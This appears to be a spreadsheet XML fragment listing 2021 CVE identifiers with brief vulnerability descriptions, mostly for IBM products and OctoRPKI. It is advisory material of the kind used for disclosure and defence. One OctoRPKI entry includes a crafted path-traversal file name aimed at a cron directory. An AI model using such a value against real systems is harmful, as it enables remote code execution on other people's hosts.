    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5 and 6.1.0.0 through 6.1.1.0 could disclose sensitive version information that could aid in future attacks against the system. IBM X-Force ID: 211414.</t>
  </si>
  <si>
    <t>CVE-2021-38955</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a local user with elevated privileges to cause a denial of service due to a file creation vulnerability in the audit commands. IBM X-Force ID: 211825.</t>
  </si>
  <si>
    <t>CVE-2021-38956</t>
  </si>
  <si>
    <t>IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 could disclose sensitive version information in HTTP response headers that could aid in further attacks against the system. IBM X-Force ID: 212038</t>
  </si>
  <si>
    <t>CVE-2021-38957</t>
  </si>
  <si>
    <t>IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 could disclose sensitive information due to hazardous input validation during QR code generation. IBM X-Force ID: 212040.</t>
  </si>
  <si>
    <t>CVE-2021-38958</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.2 CD and 9.2 LTS is affected by a denial of service attack caused by a concurrency issue. IBM X-Force ID: 212042</t>
  </si>
  <si>
    <t>CVE-2021-38959</t>
  </si>
  <si>
    <t>IBM SPSS Statistics for Windows 24.0, 25.0, 26.0, 27.0, 27.0.1, and 28.0 could allow a local user to cause a denial of service by writing arbitrary files to admin protected directories on the system. IBM X-Force ID: 212046.</t>
  </si>
  <si>
    <t>CVE-2021-38960</t>
  </si>
  <si>
    <t>IBM OPENBMC OP920, OP930, and OP940 could allow an unauthenticated user to obtain sensitive information. IBM X-Force ID: 212047.</t>
  </si>
  <si>
    <t>CVE-2021-38961</t>
  </si>
  <si>
    <t>IBM OPENBMC OP910 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 212049.</t>
  </si>
  <si>
    <t>CVE-2021-38965</t>
  </si>
  <si>
    <t>IBM FileNet Content Manager 5.5.4, 5.5.6, and 5.5.7 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 212346.</t>
  </si>
  <si>
    <t>CVE-2021-38966</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Automation 21.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 212357.</t>
  </si>
  <si>
    <t>CVE-2021-38967</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.2 CD and 9.2 LTS could allow a local privileged user to inject and execute malicious code. IBM X-Force ID: 212441.</t>
  </si>
  <si>
    <t>CVE-2021-38969</t>
  </si>
  <si>
    <t>IBM Spectrum Virtualize 8.2, 8.3, and 8.4 could allow an attacker to allow unauthorized access due to the reuse of support generated credentials. IBM X-Force ID: 212609.</t>
  </si>
  <si>
    <t>CVE-2021-3897</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability was discovered in an internal service of the Lenovo Fan Power Controller2 (FPC2) and Lenovo System Management Module (SMM) firmware during an that could allow an unauthenticated attacker to execute commands on the SMM and FPC2. SMM2 is not affected.</t>
  </si>
  <si>
    <t>CVE-2021-38971</t>
  </si>
  <si>
    <t>IBM Data Virtualization on Cloud Pak for Data 1.3.0, 1.4.1, 1.5.0, 1.7.1 and 1.7.3 could allow an authorized user to bypass data masking rules and obtain sensitve information. IBM X-Force ID: 212620.</t>
  </si>
  <si>
    <t>CVE-2021-38972</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.</t>
  </si>
  <si>
    <t>CVE-2021-38973</t>
  </si>
  <si>
    <t>CVE-2021-38974</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow an authenticated user to cause a denial of service using specially crafted HTTP requests. IBM X-Force ID: 212779.</t>
  </si>
  <si>
    <t>CVE-2021-38975</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow an authenticated user to to obtain sensitive information from a specially crafted HTTP request. IBM X-Force ID: 212780.</t>
  </si>
  <si>
    <t>CVE-2021-38976</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 stores user credentials in plain clear text which can be read by a local user. X-Force ID: 212781.</t>
  </si>
  <si>
    <t>CVE-2021-38977</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1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212782.</t>
  </si>
  <si>
    <t>CVE-2021-38978</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 212783.</t>
  </si>
  <si>
    <t>CVE-2021-38979</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software does not also use a salt as part of the input. IBM X-Force ID: 212785.</t>
  </si>
  <si>
    <t>CVE-2021-3898</t>
  </si>
  <si>
    <t>Versions of Motorola Ready For and Motorola Device Help Android applications prior to 2021-04-08 do not properly verify the server certificate which could lead to the communication channel being accessible by an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-38980</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager (IBM Security Guardium Key Lifecycle Manager) 3.0, 3.0.1, 4.0, and 4.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 212786.</t>
  </si>
  <si>
    <t>CVE-2021-38981</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 212788.</t>
  </si>
  <si>
    <t>CVE-2021-38982</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 212791.</t>
  </si>
  <si>
    <t>CVE-2021-38983</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 212792.</t>
  </si>
  <si>
    <t>CVE-2021-38984</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 212793.</t>
  </si>
  <si>
    <t>CVE-2021-38985</t>
  </si>
  <si>
    <t>CVE-2021-38986</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.2 CD and 9.2 LTS does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 212942.</t>
  </si>
  <si>
    <t>CVE-2021-38988</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 212950.</t>
  </si>
  <si>
    <t>CVE-2021-38989</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 212951.</t>
  </si>
  <si>
    <t>CVE-2021-38990</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the mount command which could lead to code execution. IBM X-Force ID: 212952.</t>
  </si>
  <si>
    <t>CVE-2021-38991</t>
  </si>
  <si>
    <t>IBM AIX 7.0, 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the lscore command which could lead to code execution. IBM X-Force ID: 212953.</t>
  </si>
  <si>
    <t>CVE-2021-38993</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the smbcd daemon to cause a denial of service. IBM X-Force ID: 212962.</t>
  </si>
  <si>
    <t>CVE-2021-38994</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213072.</t>
  </si>
  <si>
    <t>CVE-2021-38995</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213073.</t>
  </si>
  <si>
    <t>CVE-2021-38996</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213076.</t>
  </si>
  <si>
    <t>CVE-2021-38999</t>
  </si>
  <si>
    <t>IBM MQ Appliance could allow a local attacker to obtain sensitive information by inclusion of sensitive data within trace.</t>
  </si>
  <si>
    <t>CVE-2021-3900</t>
  </si>
  <si>
    <t>CVE-2021-39000</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.2 CD and 9.2 LTS could allow a local attacker to obtain sensitive information by inclusion of sensitive data within diagnostics. IBM X-Force ID: 213215.</t>
  </si>
  <si>
    <t>CVE-2021-39002</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-39006</t>
  </si>
  <si>
    <t>IBM QRadar WinCollect Agent 10.0 and 10.0.1 could allow an attacker to obtain sensitive information due to missing best practices. IBM X-Force ID: 213549.</t>
  </si>
  <si>
    <t>CVE-2021-39009</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 213554.</t>
  </si>
  <si>
    <t>CVE-2021-3901</t>
  </si>
  <si>
    <t>CVE-2021-39013</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.7.2.0, 1.7.1.0, and 1.7.0.0 could allow an authenticated user to obtain sensitive information in HTTP responses that could be used in further attacks against the system. IBM X-Force ID: 213651.</t>
  </si>
  <si>
    <t>CVE-2021-39015</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 213655.</t>
  </si>
  <si>
    <t>CVE-2021-39016</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor. IBM X-Force ID: 213722.</t>
  </si>
  <si>
    <t>CVE-2021-39017</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could allow a remote attacker to upload arbitrary files, caused by improper access controls. IBM X-Force ID: 213725.</t>
  </si>
  <si>
    <t>CVE-2021-39018</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could disclose sensitive information in a SQL error message that could aid in further attacks against the system. IBM X-Force ID: 213726.</t>
  </si>
  <si>
    <t>CVE-2021-39019</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could disclose highly sensitive information through an HTTP GET request to an authenticated user. IBM X-Force ID: 213728.</t>
  </si>
  <si>
    <t>CVE-2021-39020</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 4.0.0.7 and lower stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 213855.</t>
  </si>
  <si>
    <t>CVE-2021-39021</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 5.0.0.2 behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which could facilitate username enumeration. IBM X-Force ID: 213856.</t>
  </si>
  <si>
    <t>CVE-2021-39022</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 4.0.0.0 and 5.0.0.0 saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software. IBM X-Force ID: 213858.</t>
  </si>
  <si>
    <t>CVE-2021-39023</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 4.0.0 and 5.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 213860.</t>
  </si>
  <si>
    <t>CVE-2021-39024</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 4.0.0.0 and 5.0.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 213862.</t>
  </si>
  <si>
    <t>CVE-2021-39025</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 4.0.0.0 and 5.0.0.0 could disclose internal IP address information when the web backend is down. IBM X-Force 213863.</t>
  </si>
  <si>
    <t>CVE-2021-39026</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 5.0.0.2 and 5.0.0.3 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 213964.</t>
  </si>
  <si>
    <t>CVE-2021-39027</t>
  </si>
  <si>
    <t>IBM Guardium Data Encryption (GDE) 4.0.0 and 5.0.0 prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved. IBM X-Force ID: 213865.</t>
  </si>
  <si>
    <t>CVE-2021-39028</t>
  </si>
  <si>
    <t>IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 213866.</t>
  </si>
  <si>
    <t>CVE-2021-3903</t>
  </si>
  <si>
    <t>CVE-2021-39031</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server - Liberty 17.0.0.3 through 22.0.0.1 could allow a remote authenticated attacker to conduct an LDAP injection. By using a specially crafted request, an attacker could exploit this vulnerability and could result in in granting permission to unauthorized resources. IBM X-Force ID: 213875.</t>
  </si>
  <si>
    <t>CVE-2021-39032</t>
  </si>
  <si>
    <t>IBM Sterling Gentran:Server for Microsoft Windows 5.3 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 213962.</t>
  </si>
  <si>
    <t>CVE-2021-39033</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5 and 6.1.0.0 through 6.1.1.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 213963.</t>
  </si>
  <si>
    <t>CVE-2021-39034</t>
  </si>
  <si>
    <t>IBM MQ 9.1 LTS is vulnerable to a denial of service attack caused by an issue within the channel process. IBM X-Force ID: 213964.</t>
  </si>
  <si>
    <t>CVE-2021-39035</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 213965.</t>
  </si>
  <si>
    <t>CVE-2021-39038</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.2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213968.</t>
  </si>
  <si>
    <t>CVE-2021-3904</t>
  </si>
  <si>
    <t>grav is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-39040</t>
  </si>
  <si>
    <t>IBM Planning Analytics Workspace 2.0 could be vulnerable to malicious file upload by not validating the file types or sizes. Attackers can make use of this weakness and upload malicious executable files into the system and it can be sent to victim for performing further attacks. IBM X-Force ID: 214025.</t>
  </si>
  <si>
    <t>CVE-2021-39041</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 may be vulnerable to partial denial of service attack, resulting in some protocols not listening to specified ports. IBM X-Force ID: 214028.</t>
  </si>
  <si>
    <t>CVE-2021-39043</t>
  </si>
  <si>
    <t>IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214032.</t>
  </si>
  <si>
    <t>CVE-2021-39044</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 214210.</t>
  </si>
  <si>
    <t>CVE-2021-39045</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a local attacker to obtain information due to the autocomplete feature on password input fields. IBM X-Force ID: 214345.</t>
  </si>
  <si>
    <t>CVE-2021-39046</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346.</t>
  </si>
  <si>
    <t>CVE-2021-39047</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 and IBM Cognos Analytics 11.2.1, 11.2.0, and 11.1.7 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214349.</t>
  </si>
  <si>
    <t>CVE-2021-39048</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Client 7.1 and 8.1 is vulnerable to a stack based buffer overflow, caused by improper bounds checking. A local attacker could exploit this vulnerability and cause a denial of service. IBM X-Force ID: 214438.</t>
  </si>
  <si>
    <t>CVE-2021-39049</t>
  </si>
  <si>
    <t>IBM i2 Analyst's Notebook 9.2.0, 9.2.1, and 9.2.2 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local attacker could overflow a buffer and gain lower level privileges. IBM X-Force ID: 214439.</t>
  </si>
  <si>
    <t>CVE-2021-3905</t>
  </si>
  <si>
    <t>A memory leak was found in Open vSwitch (OVS) during userspace IP fragmentation processing. An attacker could use this flaw to potentially exhaust available memory by keeping sending packet fragments.</t>
  </si>
  <si>
    <t>CVE-2021-39050</t>
  </si>
  <si>
    <t>IBM i2 Analyst's Notebook 9.2.0, 9.2.1, and 9.2.2 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local attacker could overflow a buffer and gain lower level privileges. IBM X-Force ID: 214440.</t>
  </si>
  <si>
    <t>CVE-2021-39051</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to server-side request forgery, caused by improper input of application server registration function. A remote attacker could exploit this vulnerability using the host address and port fields of the application server registration form in the portal UI to enumerate and attack services that are running on those hosts. IBM X-Force ID: 214441.</t>
  </si>
  <si>
    <t>CVE-2021-39052</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier could allow a remote attacker to access the Spring Boot console without authorization. IBM X-Force ID: 214523.</t>
  </si>
  <si>
    <t>CVE-2021-39053</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier could allow a remote attacker to obtain sensitive information, caused by the improper handling of requests for Spectrum Copy Data Management Admin Console. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to obtain sensitive information. IBM X-Force ID: 214524.</t>
  </si>
  <si>
    <t>CVE-2021-39054</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier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214525.</t>
  </si>
  <si>
    <t>CVE-2021-39055</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534.</t>
  </si>
  <si>
    <t>CVE-2021-39056</t>
  </si>
  <si>
    <t>The IBM i 7.1, 7.2, 7.3, and 7.4 Extended Dynamic Remote SQL server (EDRSQL) could allow a remote authenticated user to send a specially crafted request and cause a denial of service. IBM X-Force ID: 214537.</t>
  </si>
  <si>
    <t>CVE-2021-39057</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0.0 through 10.1.8.x is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 214616.</t>
  </si>
  <si>
    <t>CVE-2021-39058</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 214617.</t>
  </si>
  <si>
    <t>CVE-2021-39059</t>
  </si>
  <si>
    <t>IBM Jazz Foundation (IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214619.</t>
  </si>
  <si>
    <t>CVE-2021-3906</t>
  </si>
  <si>
    <t>bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type</t>
  </si>
  <si>
    <t>CVE-2021-39063</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0.0 through 10.1.8.x uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information due to a misconfiguration in access control headers. IBM X-Force ID: 214956.</t>
  </si>
  <si>
    <t>CVE-2021-39064</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier has weak authentication and password rules and incorrectly handles default credentials for the Spectrum Copy Data Management Admin console. IBM X-Force ID: 214957.</t>
  </si>
  <si>
    <t>CVE-2021-39065</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the Spectrum Copy Data Management Admin Console login and uploadcertificate function . A remote attacker could inject arbitrary shell commands which would be executed on the affected system. IBM X-Force ID: 214958.</t>
  </si>
  <si>
    <t>CVE-2021-39066</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.2.4 does not invalidate session any existing session identifier gives an attacker the opportunity to steal authenticated sessions. IBM X-Force ID: 215040.</t>
  </si>
  <si>
    <t>CVE-2021-39068</t>
  </si>
  <si>
    <t>IBM Curam Social Program Management 8.0.1 and 7.0.11 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 215306.</t>
  </si>
  <si>
    <t>CVE-2021-3907</t>
  </si>
  <si>
    <t>OctoRPKI does not escape a URI with a filename containing "..", this allows a repository to create a file, (ex. rsync://example.org/repo/../../etc/cron.daily/evil.roa), which would then be written to disk outside the base cache folder. This could allow for remote code execution on the host machine OctoRPKI is running on.</t>
  </si>
  <si>
    <t>CVE-2021-39070</t>
  </si>
  <si>
    <t>IBM Security Verify Access 10.0.0.0, 10.0.1.0 and 10.0.2.0 with the advanced access control authentication service enabled could allow an attacker to authenticate as any user on the system. IBM X-Force ID: 215353.</t>
  </si>
  <si>
    <t>CVE-2021-39072</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.3 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 215581.</t>
  </si>
  <si>
    <t>CVE-2021-39074</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2021-39076</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.5 and 11.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt sensitive information. IBM X-Force ID: 215585.</t>
  </si>
  <si>
    <t>CVE-2021-39077</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.5, 10.6, 11.0, 11.1, 11.2, 11.3, and 11.4 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 215587.</t>
  </si>
  <si>
    <t>CVE-2021-39078</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.5 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 215589.</t>
  </si>
  <si>
    <t>CVE-2021-39079</t>
  </si>
  <si>
    <t>IBM Cognos Analytics Mobile for Android applications prior to version 1.1.14 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 215592.</t>
  </si>
  <si>
    <t>CVE-2021-3908</t>
  </si>
  <si>
    <t>OctoRPKI does not limit the depth of a certificate chain, allowing for a CA to create children in an ad-hoc fashion, thereby making tree traversal never end.</t>
  </si>
  <si>
    <t>CVE-2021-39080</t>
  </si>
  <si>
    <t>Due to weak obfuscation, IBM Cognos Analytics Mobile for Android application prior to version 1.1.14 , an attacker could be able to reverse engineer the codebase to gain knowledge about the programming technique, interface, class definitions, algorithms and functions used. IBM X-Force ID: 215593.</t>
  </si>
  <si>
    <t>CVE-2021-39082</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 7.1.1.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-39085</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 215888.</t>
  </si>
  <si>
    <t>CVE-2021-39086</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 215889.</t>
  </si>
  <si>
    <t>CVE-2021-39087</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 could allow an authenticated user to obtain sensitive information due to improper permission controls. IBM X-Force ID: 216109.</t>
  </si>
  <si>
    <t>CVE-2021-39088</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 is vulnerable to local privilege escalation if this could be combined with other unknown vulnerabilities then privilege escalation could be performed. IBM X-Force ID: 216111.</t>
  </si>
  <si>
    <t>CVE-2021-3909</t>
  </si>
  <si>
    <t>OctoRPKI does not limit the length of a connection, allowing for a slowloris DOS attack to take place which makes OctoRPKI wait forever. Specifically, the repository that OctoRPKI sends HTTP requests to will keep the connection open for a day before a response is returned, but does keep drip feeding new bytes to keep the connection alive.</t>
  </si>
  <si>
    <t>CVE-2021-3910</t>
  </si>
  <si>
    <t>OctoRPKI crashes when encountering a repository that returns an invalid ROA (just an encoded NUL (\0) character).</t>
  </si>
  <si>
    <t>CVE-2021-39109</t>
  </si>
  <si>
    <t>The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3911</t>
  </si>
  <si>
    <t>If the ROA that a repository returns contains too many bits for the IP address then OctoRPKI will crash.</t>
  </si>
  <si>
    <t>CVE-2021-39111</t>
  </si>
  <si>
